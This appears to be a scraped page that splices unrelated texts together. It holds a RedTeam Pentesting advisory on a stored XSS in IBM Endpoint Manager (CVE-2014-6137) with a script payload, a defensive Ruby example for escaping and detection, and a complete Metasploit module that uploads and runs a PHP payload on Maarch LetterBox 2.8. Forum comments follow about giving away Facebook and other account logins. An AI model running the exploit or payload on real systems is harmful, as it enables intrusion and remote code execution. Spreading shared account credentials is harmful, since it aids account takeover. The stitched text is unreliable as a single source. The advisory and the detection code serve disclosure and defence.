During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser.

Details
=======
Product: IBM Endpoint Manager
Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48
Fixed Versions: 9.1.1229, 9.2.1.48
Vulnerability Type: Cross-Site Scripting
Security Risk: medium
Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
Advisory Status: published
CVE: CVE-2014-6137
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137

Introduction
============
IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time.

(from the vendor's homepage)

More Details
============
Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information.

For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion
    &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
    &version=1
    &useCRC=0

The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter:

http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion
    &version=1
    &url=http://"><script>alert(/XSS/)</script>
    &version=1
    &useCRC=0

The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser:

$ curl http://tem-relay.example.com:52311/rd
[...]
<select NAME="url">
[...]
<option>http://"><script>alert(/XSS/)</script></option>
</select>

Proof of Concept
================
http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
    BESGatherMirrorNew.exe/-gatherversion
    ?Body=GatherSpecifiedVersion&version=1
    &url=http://"><script>alert(/XSS/)</script>
    &version=1
    &useCRC=0

Fix
===
Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.

Security Risk
=============
As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk.

Timeline
========
2014-07-29 Vulnerability identified during a penetration test
2014-08-06 Customer approves disclosure to vendor
2014-09-03 Vendor notified
2015-01-13 Vendor releases security bulletin and software upgrade
2015-02-04 Customer approves public disclosure
2015-02-10 Advisory released

RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            https://www.redteam-pentesting.de
Germany                                 Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Source
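Two checks that close the hole described in the advisory above, as an added example in Ruby (not IBM's code and not part of the RedTeam advisory): output-encode every stored url value when the site list is rendered, and refuse to store a url parameter that is not a parseable absolute http(s) URL. A third function inspects rendered /rd markup for option texts that still contain raw markup characters, which is what the curl output above shows. GOOD_URL and XSS_URL are constructed from the advisory's own examples; the function names are this example's own.

```ruby
require 'cgi'
require 'uri'

# Constructed sample values: a legitimate gather URL of the kind the
# diagnostics page stores, and the payload shown in the advisory.
GOOD_URL = 'http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite'
XSS_URL  = 'http://"><script>alert(/XSS/)</script>'

# How the vulnerable page behaves: stored values are written into the
# <option> text verbatim, so a value containing markup becomes markup.
def render_site_list_unsafe(urls)
  options = urls.map { |u| "<option>#{u}</option>" }
  "<select NAME=\"url\">\n#{options.join("\n")}\n</select>"
end

# Output encoding: every stored value is HTML-escaped at render time, so
# '<', '>', '"' and '&' stay literal text inside the option.
def render_site_list(urls)
  options = urls.map { |u| "<option>#{CGI.escapeHTML(u)}</option>" }
  "<select NAME=\"url\">\n#{options.join("\n")}\n</select>"
end

# Input validation for the url parameter before it is stored: reject
# characters that are never legal in a URL, then require an absolute
# http(s) URL with a host. Scheme-only or javascript: values fail too.
def valid_gather_url?(value)
  return false unless value.is_a?(String)
  return false if value =~ /[<>"'\s]/
  uri = URI.parse(value)
  %w[http https].include?(uri.scheme) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

# Detection over a fetched /rd page (here: a rendered string): return the
# option texts that still contain raw markup characters.
def injected_options(html)
  html.scan(%r{<option>(.*?)</option>}m).flatten.select { |text| text =~ /[<>"]/ }
end

if $PROGRAM_NAME == __FILE__
  puts render_site_list_unsafe([GOOD_URL, XSS_URL])
  puts render_site_list([GOOD_URL, XSS_URL])
  p injected_options(render_site_list_unsafe([GOOD_URL, XSS_URL])) # [XSS_URL]
  p valid_gather_url?(GOOD_URL), valid_gather_url?(XSS_URL)        # true, false
end
```

Either check alone would have stopped this particular payload; applying both matters because the stored value is rendered in more than one place and later code paths tend to forget to encode. Running injected_options against the live /rd output of a relay is a quick way to confirm whether a payload is already stored before patching.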
  18. ##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'uri'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Maarch LetterBox 2.8 Unrestricted File Upload',
      'Description'    => %q{
        This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of
        session and file validation in the file_to_index.php script. It allows unauthenticated users
        to upload files of any type and subsequently execute PHP scripts in the context of the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Rob Carr <rob[at]rastating.com>'
        ],
      'References'     =>
        [
          ['CVE', '2015-1587']
        ],
      'DisclosureDate' => 'Feb 11 2015',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Maarch LetterBox 2.8', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/'])
      ], self.class)
  end

  def letterbox_login_url
    normalize_uri(target_uri.path, 'login.php')
  end

  def letterbox_upload_url
    normalize_uri(target_uri.path, 'file_to_index.php')
  end

  def check
    res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url)

    if res.nil? || res.code != 200
      return Msf::Exploit::CheckCode::Unknown
    elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"')
      return Msf::Exploit::CheckCode::Appears
    end

    Msf::Exploit::CheckCode::Safe
  end

  # Build the multipart body: a single "file" part carrying the PHP payload.
  def generate_mime_message(payload, name)
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"")
    data
  end

  def exploit
    print_status("#{peer} - Preparing payload...")
    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
    data = generate_mime_message(payload, payload_name)

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => letterbox_upload_url,
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => data.to_s
    )

    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200

    print_status("#{peer} - Parsing server response...")
    # The script echoes its upload array; pull the stored path out of it. Check the
    # match itself before reading captures, otherwise a non-matching body raises
    # NoMethodError instead of failing cleanly.
    match = res.body.match(/\[local_path\] => (.*\.php)/i)
    fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if match.nil? || match[1].nil?

    payload_url = normalize_uri(target_uri.path, match[1])
    print_good("#{peer} - Response parsed successfully")

    print_status("#{peer} - Executing the payload at #{payload_url}")
    register_files_for_cleanup(File.basename(URI.parse(payload_url).path))
    send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
  end
end

Source
  19. I don't get why you all keep going on about "encrypt the password / next time encrypt it". What the hell is so hard about going to Encrypt or Decrypt sensitive data using AES/DES/RCA encryptors. and that's it (it tells you what it's encrypted with anyway). Since it's FREE STUFF it's for everyone, both for you who know more and for Dorel the Dumb, so keep your mouths shut and stop commenting nonsense just for a +1. You think you're on HF or what?
  20. 154.33 I don't use it, that's why I thought I'd help those who need an account!
  21. You get absolutely nothing. Why? You weren't supposed to post here but send a PM, plus you don't meet the requirements.
  22. @Cifre I didn't get anything bro... Done, got it!
  23. The guy already said to keep quiet if you have nothing to say... On:// You have a PM!
  24. Those Facebook accounts are perfect! Thanks.
  25. - Don't post "give me one too" etc. here... PM! What part of that don't you understand?! Done, you have a PM! Off:// Don't change the password, it's pointless... it's my account!